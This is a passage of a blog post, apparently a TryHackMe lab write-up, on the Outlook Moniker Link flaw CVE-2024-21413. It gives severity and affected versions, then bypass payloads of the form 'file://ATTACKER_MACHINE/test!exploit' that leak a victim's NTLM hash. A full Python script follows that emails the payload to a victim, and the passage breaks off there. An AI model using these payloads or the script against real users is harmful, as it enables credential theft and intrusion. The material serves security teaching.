{"id":584,"date":"2024-03-03T13:49:04","date_gmt":"2024-03-03T19:49:04","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=584"},"modified":"2024-04-16T20:54:10","modified_gmt":"2024-04-17T01:54:10","slug":"moniker-link-cve-2024-21413","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/","title":{"rendered":"Moniker Link (CVE-2024-21413)"},"content":{"rendered":"\n<p>On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE &amp; credential leak vulnerability with the assigned CVE of <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2024-21413\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2024-21413<\/a> (Moniker Link). Haifei Li of Check Point Research is credited with <a href=\"https:\/\/research.checkpoint.com\/2024\/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">discovering the vulnerability<\/a>.<\/p>\n\n\n\n<p>The vulnerability bypasses Outlook&#8217;s security mechanisms when handling a specific type of hyperlink known as a Moniker Link. 
An attacker can abuse this by sending an email that contains a malicious Moniker Link to a victim, resulting in Outlook sending the user&#8217;s NTLM credentials to the attacker once the hyperlink is clicked.<\/p>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03af9019e61&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03af9019e61\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" data-attachment-id=\"586\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/image-1-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?fit=1900%2C300&amp;ssl=1\" data-orig-size=\"1900,300\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?fit=1024%2C162&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1024%2C162&#038;ssl=1\" alt=\"\" class=\"wp-image-586\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1024%2C162&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=300%2C47&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=768%2C121&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1536%2C243&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?w=1900&amp;ssl=1 1900w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>This blog is based on <a href=\"https:\/\/tryhackme.com\/room\/monikerlink\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">TryHackMe&#8217;s <\/a>free room on CVE-2024-21413.<\/p>\n\n\n\n<p>Details relating to the scoring of the vulnerability have been provided in the table below:<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><table>\n<thead>\n<tr>\n<th><strong>CVSS<\/strong><\/th>\n<th><strong>Description<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Publish date<\/td>\n<td>February 13th, 
2024<\/td>\n<\/tr>\n<tr>\n<td>MS article<\/td>\n<td><a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/msrc.microsoft.com\/update-guide\/en-US\/vulnerability\/CVE-2024-21413<\/a><\/td>\n<\/tr>\n<tr>\n<td>Impact<\/td>\n<td>Remote Code Execution &amp; Credential Leak<\/td>\n<\/tr>\n<tr>\n<td>Severity<\/td>\n<td>Critical<\/td>\n<\/tr>\n<tr>\n<td>Attack Complexity<\/td>\n<td>Low<\/td>\n<\/tr>\n<tr>\n<td>Scoring<\/td>\n<td>9.8<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The vulnerability is known to affect the following Office releases:<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><table>\n<thead>\n<tr>\n<th><strong>Release<\/strong><\/th>\n<th><strong>Version<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Microsoft Office LTSC 2021<\/td>\n<td>affected from 19.0.0<\/td>\n<\/tr>\n<tr>\n<td>Microsoft 365 Apps for Enterprise<\/td>\n<td>affected from 16.0.1<\/td>\n<\/tr>\n<tr>\n<td>Microsoft Office 2019<\/td>\n<td>affected from 16.0.1<\/td>\n<\/tr>\n<tr>\n<td>Microsoft Office 2016<\/td>\n<td>affected from 16.0.0 before 16.0.5435.1001<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-da341f6e-98bf-4e52-bb23-b41f61ec20b7\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"background-color: #000000; color: #fcb900; \">\n\t\t\t<div class=\"ub_table-of-contents-header\" 
style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\" style=\"color: #fcb900; \">Table Of Contents<\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"background-color: #000000; \">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#0-moniker-link-cve-2024-21413-\" style=\"color: #fcb900; \">Moniker Link (CVE-2024-21413)<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#1-exploitation-\" style=\"color: #fcb900; \">Exploitation<\/a><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#2-detection-\" style=\"color: #fcb900; \">Detection<\/a><ul><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#3-yara-\" style=\"color: #fcb900; \">YARA<\/a><\/li><\/ul><\/li><li style=\"color: #ffffff; \"><a href=\"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/#4-remediation-\" style=\"color: #fcb900; \">Remediation<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-moniker-link-cve-2024-21413-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Moniker Link (CVE-2024-21413)<\/mark><\/h2>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Outlook can render emails as HTML. You may notice this being used by your favourite newsletters. Additionally, Outlook can parse hyperlinks such as HTTP and HTTPS. 
However, it can also open URLs specifying applications known as <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/com\/url-monikers\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Moniker Links<\/a>.&nbsp;Normally, Outlook will prompt a security warning when external applications are triggered.<\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/research.checkpoint.com\/wp-content\/uploads\/2024\/02\/HBNP4GTD5Y-image1.png?ssl=1\" alt=\"Outlooks Protected View is triggered when launching an external application\"\/><\/figure>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This pop-up is a result of Outlook&#8217;s &#8220;Protected View&#8221;. Protected View opens emails containing attachments, hyperlinks, and similar content in read-only mode, blocking things such as macros (especially from outside an organization).&nbsp;<\/p>\n\n\n\n<p>By using the <code>file:\/\/<\/code> Moniker Link in our hyperlink, we can instruct Outlook to attempt to access a file, such as a file on a network share. 
The SMB protocol is used, which involves using local credentials for authentication.&nbsp;However, Outlook&#8217;s &#8220;Protected View&#8221; catches and blocks this attempt.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 
2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">&lt;<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;&lt;<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B; font-style: italic\">href<\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">file:\/\/ATTACKER_MACHINE\/test<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">&gt;Click me&lt;\/<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\">&gt;&lt;\/<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The vulnerability is triggered by modifying the Moniker Link in our hyperlink to include the <code>!<\/code> special character and some text, which bypasses Outlook\u2019s Protected View. 
For example:<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"&lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" 
tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">&lt;<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;&lt;<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B; font-style: italic\">href<\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">file:\/\/ATTACKER_MACHINE\/test!exploit<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">&gt;Click me&lt;\/<\/span><span style=\"color: #FF79C6\">a<\/span><span style=\"color: #F8F8F2\">&gt;&lt;\/<\/span><span style=\"color: #FF79C6\">p<\/span><span style=\"color: #F8F8F2\">&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We, as attackers, can provide a Moniker Link of this nature for the attack. Remote Code Execution (RCE) is also possible because Moniker Links use the Component Object Model (COM) on Windows.<\/p>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Note that the share does not need to exist on the remote device, as an authentication attempt will be made regardless, leading to the victim\u2019s Windows netNTLMv2 hash being sent to the attacker.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"1-exploitation-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Exploitation<\/mark><\/h2>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The objective, as the attacker, is to craft an email to the victim with a Moniker Link that bypasses Outlook&#8217;s &#8220;Protected View&#8221;, where 
the victim\u2019s client will attempt to load a file from our attacking machine, resulting in the victim\u2019s netNTLMv2&nbsp;hash being captured.<\/p>\n\n\n\n<p>But first, let\u2019s run through a PoC I have created (which is also available on <a href=\"https:\/\/github.com\/CMNatic\/CVE-2024-21413\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub<\/a>).<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#272822\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.utils import formataddr\n\nsender_email = 'attacker@monikerlink.thm' # Replace with your sender email address\nreceiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address\npassword = input(&quot;Enter your attacker email password: &quot;)\nhtml_content = &quot;&quot;&quot;\\\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n    &lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click 
me&lt;\/a&gt;&lt;\/p&gt;\n\n    &lt;\/body&gt;\n&lt;\/html&gt;&quot;&quot;&quot;\n\nmessage = MIMEMultipart()\nmessage['Subject'] = &quot;CVE-2024-21413&quot;\nmessage[&quot;From&quot;] = formataddr(('CMNatic', sender_email))\nmessage[&quot;To&quot;] = receiver_email\n\n# Convert the HTML string into bytes and attach it to the message object\nmsgHtml = MIMEText(html_content,'html')\nmessage.attach(msgHtml)\n\nserver = smtplib.SMTP('MAILSERVER', 25)\nserver.ehlo()\ntry:\n    server.login(sender_email, password)\nexcept Exception as err:\n    print(err)\n    exit(-1)\n\ntry:\n    server.sendmail(sender_email, [receiver_email], message.as_string())\n    print(&quot;\\n Email delivered&quot;)\nexcept Exception as error:\n    print(error)\nfinally:\n    server.quit()\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki monokai\" style=\"background-color: #272822\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> smtplib<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> email.mime.text <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> MIMEText<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span 
style=\"color: #F8F8F2\"> email.mime.multipart <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> MIMEMultipart<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">from<\/span><span style=\"color: #F8F8F2\"> email.utils <\/span><span style=\"color: #F92672\">import<\/span><span style=\"color: #F8F8F2\"> formataddr<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">sender_email <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;attacker@monikerlink.thm&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #88846F\"># Replace with your sender email address<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">receiver_email <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&#39;victim@monikerlink.thm&#39;<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #88846F\"># Replace with the recipient email address<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">password <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF\">input<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&quot;Enter your attacker email password: &quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">html_content <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&quot;&quot;&quot;<\/span><span style=\"color: #AE81FF\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;!DOCTYPE html&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;html lang=&quot;en&quot;&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#E6DB74\">    &lt;p&gt;&lt;a href=&quot;file:\/\/ATTACKER_MACHINE\/test!exploit&quot;&gt;Click me&lt;\/a&gt;&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">    &lt;\/body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #E6DB74\">&lt;\/html&gt;&quot;&quot;&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> MIMEMultipart()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&#39;Subject&#39;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #E6DB74\">&quot;CVE-2024-21413&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&quot;From&quot;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> formataddr((<\/span><span style=\"color: #E6DB74\">&#39;CMNatic&#39;<\/span><span style=\"color: #F8F8F2\">, sender_email))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">message[<\/span><span style=\"color: #E6DB74\">&quot;To&quot;<\/span><span style=\"color: #F8F8F2\">] <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> receiver_email<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #88846F\"># Convert the HTML string into bytes and attach it to the message object<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">msgHtml <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> MIMEText(html_content,<\/span><span style=\"color: #E6DB74\">&#39;html&#39;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #F8F8F2\">message.attach(msgHtml)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">server <\/span><span style=\"color: #F92672\">=<\/span><span style=\"color: #F8F8F2\"> smtplib.SMTP(<\/span><span style=\"color: #E6DB74\">&#39;MAILSERVER&#39;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #AE81FF\">25<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">server.ehlo()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.login(sender_email, password)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">as<\/span><span style=\"color: #F8F8F2\"> err:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(err)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">exit<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #F92672\">-<\/span><span style=\"color: #AE81FF\">1<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">try<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.sendmail(sender_email, [receiver_email], message.as_string())<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E6DB74\">&quot;<\/span><span 
style=\"color: #AE81FF\">\\n<\/span><span style=\"color: #E6DB74\"> Email delivered&quot;<\/span><span style=\"color: #F8F8F2\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">except<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #66D9EF; font-style: italic\">Exception<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #F92672\">as<\/span><span style=\"color: #F8F8F2\"> error:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    <\/span><span style=\"color: #66D9EF\">print<\/span><span style=\"color: #F8F8F2\">(error)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F92672\">finally<\/span><span style=\"color: #F8F8F2\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">    server.quit()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div 